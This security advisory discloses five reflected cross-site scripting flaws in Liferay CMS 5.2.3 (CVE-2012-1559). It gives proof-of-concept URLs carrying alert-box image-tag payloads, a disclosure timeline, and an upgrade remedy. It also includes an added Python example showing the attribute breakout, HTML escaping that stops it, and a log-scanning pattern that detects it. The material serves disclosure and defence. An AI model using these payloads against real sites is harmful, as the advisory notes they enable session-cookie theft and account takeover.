Multiple Cross-Site Scripting Vulnerabilities in Liferay CMS

Advisory Information
Title: Multiple Cross-Site Scripting Vulnerabilities in Liferay CMS Community Edition 5.2.3
Release date: 17/05/2012
Last update: 17/05/2012
Credits: Coppeto Nello, Vapore Francesco, Cersosimo Fiorenzo, Del Gobbo Primo, Imperato Pasquale (Emaze Networks S.p.A.)


Vulnerability Information
Class: Input Validation Vulnerability, Cross-site Scripting
CVE: CVE-2012-1559

Affected Software
We confirm the presence of the security vulnerabilities on the following product versions:

  • Liferay Community Edition 5.2.3


Vulnerability Details
The parameters listed below are reflected into the page without proper output encoding, so a crafted URL can run attacker-supplied script in the victim's browser. This can be exploited to disclose the user's session cookie, allowing an attacker to hijack the user's session and take over the account.

1) Page: group/control_panel/manage | Parameter: _140_tabs4

https://example.com/group/control_panel/manage?p_p_id=140&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_140_struts_action=%2Fmy_pages%2Fedit_pages&_140_tabs1=public-pages&_140_tabs2=pages&_140_tabs3=children&_140_redirect=&_140_groupId=28263&_140_tabs4=5d0cc%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E6cc79885871&_140_selPlid=0

2) Page: group/control_panel/manage | Parameter: _140_groupId

https://example.com/group/control_panel/manage?p_p_id=140&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_140_struts_action=%2Fmy_pages%2Fedit_pages&_140_tabs1=public-pages&_140_privateLayout=false&_140_backURL=&_140_groupId=28263&261a4</ScRiPt%20><img%20src%3da%20onerror%3dalert('XSS')>74c1e2fc3d9=1

3) Page: user/username/home | Parameter: _2_redirect

https://example.com/user/username/home?p_p_id=2&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_2_struts_action=%2Fmy_account%2Fedit_pages&_2_tabs1=public-pages&_2_redirect=%2Fimage%2F6144a"><img%20src%3da%20onerror%3dalert('XSS')>17c36eda2e6&_2_groupId=28263

4) Page: user/username/home | Parameter: _88_redirect

https://example.com/user/username/home?p_p_id=88&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_88_struts_action=%2Flayout_management%2Fedit_pages&_88_tabs1=private-pages&_88_redirect=%2Fimage%2Fdfcdb"><img%20src%3da%20onerror%3dalert('XSS')>d71e7518a9b&_88_groupId=28263&_88_selPlid=29301

5) Page: user/username/home | Parameter: _2_groupId

https://example.com/user/username/home?p_p_id=2&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_2_struts_action=%2Fmy_account%2Fedit_pages&_2_tabs1=public-pages&_2_redirect=%2Fimage%2F&_2_groupId=28263&c46be</ScRiPt%20><img%20src%3da%20onerror%3dalert('XSS')>026191b6b04=1
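The following Python example is added here for illustration and is not part of the advisory, nor Liferay or Emaze code. It uses a hypothetical stand-in for the affected portlet page (the parameter is reflected into a hidden input's value attribute, which is an assumption about the page's markup) to show why the `"><img ...>` value from PoC 1 breaks out of the attribute context when rendered verbatim and why contextual HTML escaping stops it, and it runs a simple check over two constructed access-log lines to flag requests carrying this class of payload.

```python
"""Added example: attribute-context reflection, its escaped counterpart, and a
log check for markup in decoded query parameters. The render_* functions are
constructed stand-ins for the portlet's JSP, not Liferay source."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit


def render_unescaped(tabs_value: str) -> str:
    """Vulnerable stand-in: the value lands verbatim inside a double-quoted attribute."""
    return f'<input type="hidden" name="_140_tabs4" value="{tabs_value}">'


def render_escaped(tabs_value: str) -> str:
    """Hardened stand-in: HTML-escape the value; quote=True also encodes \" and '."""
    return f'<input type="hidden" name="_140_tabs4" value="{html.escape(tabs_value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    """Return the element names a browser-like parser sees in the markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


# The _140_tabs4 value from PoC 1 of the advisory, URL-decoded.
POC_TABS4 = "5d0cc\"><img src=a onerror=alert('XSS')>6cc79885871"

# A tag opening or an inline event-handler attribute, checked against the
# decoded query-string keys as well as values (PoC 2 and 5 put the markup in a key).
_SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.I)


def suspicious_params(url: str) -> list:
    """Return (name, value) pairs whose decoded name or value looks like markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if _SUSPICIOUS.search(name) or _SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits


# Constructed access-log lines (not real traffic); the second carries PoC 1's query string.
ACCESS_LOG = [
    '10.0.0.5 - - [17/May/2012:10:00:01 +0200] "GET /group/control_panel/manage'
    '?p_p_id=140&_140_tabs4=pages HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/May/2012:10:00:07 +0200] "GET /group/control_panel/manage'
    '?p_p_id=140&_140_tabs4=5d0cc%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E6cc79885871'
    ' HTTP/1.1" 200 5120',
]


def flag_log_lines(lines) -> list:
    """Return the indexes of log lines whose request URL carries a suspicious parameter."""
    flagged = []
    for i, line in enumerate(lines):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if match and suspicious_params(match.group(1)):
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    print(start_tags(render_unescaped(POC_TABS4)))  # ['input', 'img']
    print(start_tags(render_escaped(POC_TABS4)))    # ['input']
    print(flag_log_lines(ACCESS_LOG))               # [1]
```

The parser view is the point: with verbatim reflection the single hidden input becomes two elements, the second carrying an event handler, while the escaped rendering keeps the whole value inside one attribute. The log check decodes the query string before matching, since the payloads in the advisory arrive percent-encoded.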

Remediation
Upgrade to Liferay 6.

Report Timeline
  • 23/01/2012 - Initial vendor contact.
  • 25/01/2012 - Vendor replied.
  • 08/02/2012 - Emaze opened a detailed security ticket on Liferay Issues Portal.
  • 17/02/2012 - Vendor replied that the issues are known and have been fixed in product version 6.1.0.
  • 02/03/2012 - Emaze asked for additional technical details and the CVE ID of the vulnerabilities.
  • 02/03/2012 - Vendor replied that it had no CVE ID or other details.
  • 06/03/2012 - Emaze asked for a private email address to discuss the details of the vulnerabilities.
  • 17/05/2012 - No reply. Disclosure.


Copyright
Copyright(c) Emaze Networks S.p.A. 2012, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Emaze Networks has updated ipLegion, its vulnerability assessment platform, to check for this vulnerability. Contact info@emaze.net to have more information about ipLegion.

Disclaimer
Emaze Networks S.p.A. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.